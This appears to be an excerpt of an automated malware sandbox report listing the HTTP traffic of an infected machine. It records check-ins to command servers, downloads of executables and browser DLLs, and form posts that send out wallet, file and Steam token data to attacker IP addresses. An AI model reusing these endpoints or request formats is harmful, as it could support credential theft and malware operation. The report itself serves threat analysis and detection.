Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 32 35 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000254001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /inc/crypted.exe HTTP/1.1Host: 185.215.113.117
Source: global traffic	HTTP traffic detected: GET /f1ddeb6592c03206/freebl3.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: GET /f1ddeb6592c03206/mozglue.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 32 39 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000290001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /f1ddeb6592c03206/msvcp140.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: GET /inc/LummaC222222.exe HTTP/1.1Host: 185.215.113.117
Source: global traffic	HTTP traffic detected: GET /f1ddeb6592c03206/nss3.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /f1ddeb6592c03206/softokn3.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 33 31 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000314001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: GET /f1ddeb6592c03206/vcruntime140.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /inc/newbundle2.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJDGCAEBFIIECAKFHIJEHost: 185.215.113.17Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 33 32 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000322001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKJDBAAAEHIEGCAKFHCGHost: 185.215.113.17Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 42 41 41 41 45 48 49 45 47 43 41 4b 46 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 32 37 63 31 30 64 64 38 65 34 39 31 66 38 38 34 30 61 62 63 61 65 65 66 35 61 30 31 38 65 35 62 36 34 39 62 64 64 33 62 62 33 65 66 33 63 30 64 37 33 64 39 32 33 31 31 32 66 37 62 64 32 35 32 32 33 63 61 64 37 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 42 41 41 41 45 48 49 45 47 43 41 4b 46 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 42 41 41 41 45 48 49 45 47 43 41 4b 46 48 43 47 2d 2d 0d 0a Data Ascii: ------JKJDBAAAEHIEGCAKFHCGContent-Disposition: form-data; name="token"4727c10dd8e491f8840abcaeef5a018e5b649bdd3bb3ef3c0d73d923112f7bd25223cad7------JKJDBAAAEHIEGCAKFHCGContent-Disposition: form-data; name="message"wallets------JKJDBAAAEHIEGCAKFHCG--
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGHDAKKJJJKJKECBGCGDHost: 185.215.113.17Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 48 44 41 4b 4b 4a 4a 4a 4b 4a 4b 45 43 42 47 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 32 37 63 31 30 64 64 38 65 34 39 31 66 38 38 34 30 61 62 63 61 65 65 66 35 61 30 31 38 65 35 62 36 34 39 62 64 64 33 62 62 33 65 66 33 63 30 64 37 33 64 39 32 33 31 31 32 66 37 62 64 32 35 32 32 33 63 61 64 37 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 44 41 4b 4b 4a 4a 4a 4b 4a 4b 45 43 42 47 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 44 41 4b 4b 4a 4a 4a 4b 4a 4b 45 43 42 47 43 47 44 2d 2d 0d 0a Data Ascii: ------CGHDAKKJJJKJKECBGCGDContent-Disposition: form-data; name="token"4727c10dd8e491f8840abcaeef5a018e5b649bdd3bb3ef3c0d73d923112f7bd25223cad7------CGHDAKKJJJKJKECBGCGDContent-Disposition: form-data; name="message"files------CGHDAKKJJJKJKECBGCGD--
Source: global traffic	HTTP traffic detected: GET /inc/rstxdhuj.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKECBFBAEBKJJJJKFCGCHost: 185.215.113.17Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 32 37 63 31 30 64 64 38 65 34 39 31 66 38 38 34 30 61 62 63 61 65 65 66 35 61 30 31 38 65 35 62 36 34 39 62 64 64 33 62 62 33 65 66 33 63 30 64 37 33 64 39 32 33 31 31 32 66 37 62 64 32 35 32 32 33 63 61 64 37 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 2d 2d 0d 0a Data Ascii: ------AKECBFBAEBKJJJJKFCGCContent-Disposition: form-data; name="token"4727c10dd8e491f8840abcaeef5a018e5b649bdd3bb3ef3c0d73d923112f7bd25223cad7------AKECBFBAEBKJJJJKFCGCContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------AKECBFBAEBKJJJJKFCGCContent-Disposition: form-data; name="file"------AKECBFBAEBKJJJJKFCGC--
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJDHDAECBGCAKEBAEBAHost: 185.215.113.17Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 44 48 44 41 45 43 42 47 43 41 4b 45 42 41 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 32 37 63 31 30 64 64 38 65 34 39 31 66 38 38 34 30 61 62 63 61 65 65 66 35 61 30 31 38 65 35 62 36 34 39 62 64 64 33 62 62 33 65 66 33 63 30 64 37 33 64 39 32 33 31 31 32 66 37 62 64 32 35 32 32 33 63 61 64 37 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 44 48 44 41 45 43 42 47 43 41 4b 45 42 41 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 44 48 44 41 45 43 42 47 43 41 4b 45 42 41 45 42 41 2d 2d 0d 0a Data Ascii: ------GHJDHDAECBGCAKEBAEBAContent-Disposition: form-data; name="token"4727c10dd8e491f8840abcaeef5a018e5b649bdd3bb3ef3c0d73d923112f7bd25223cad7------GHJDHDAECBGCAKEBAEBAContent-Disposition: form-data; name="message"ybncbhylepme------GHJDHDAECBGCAKEBAEBA--
Source: global traffic	HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKECFIIEHCFHIECAFBAKHost: 185.215.113.17Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 45 43 46 49 49 45 48 43 46 48 49 45 43 41 46 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 32 37 63 31 30 64 64 38 65 34 39 31 66 38 38 34 30 61 62 63 61 65 65 66 35 61 30 31 38 65 35 62 36 34 39 62 64 64 33 62 62 33 65 66 33 63 30 64 37 33 64 39 32 33 31 31 32 66 37 62 64 32 35 32 32 33 63 61 64 37 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 43 46 49 49 45 48 43 46 48 49 45 43 41 46 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 43 46 49 49 45 48 43 46 48 49 45 43 41 46 42 41 4b 2d 2d 0d 0a Data Ascii: ------BKECFIIEHCFHIECAFBAKContent-Disposition: form-data; name="token"4727c10dd8e491f8840abcaeef5a018e5b649bdd3bb3ef3c0d73d923112f7bd25223cad7------BKECFIIEHCFHIECAFBAKContent-Disposition: form-data; name="message"wkkjqaiaxkhb------BKECFIIEHCFHIECAFBAK--
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 33 34 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000342001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 91.202.233.158Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /inc/cccc2.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: POST /e96ea2db21fa9a1b.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKJDHDBKEBGHJJJJKEHDHost: 91.202.233.158Content-Length: 214Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 48 44 42 4b 45 42 47 48 4a 4a 4a 4a 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 46 39 45 32 46 37 32 32 41 39 35 31 31 31 37 33 38 38 33 36 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 48 44 42 4b 45 42 47 48 4a 4a 4a 4a 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 48 44 42 4b 45 42 47 48 4a 4a 4a 4a 4b 45 48 44 2d 2d 0d 0a Data Ascii: ------JKJDHDBKEBGHJJJJKEHDContent-Disposition: form-data; name="hwid"EF9E2F722A951117388365------JKJDHDBKEBGHJJJJKEHDContent-Disposition: form-data; name="build"default------JKJDHDBKEBGHJJJJKEHD--
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 33 34 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000349001&unit=246122658369
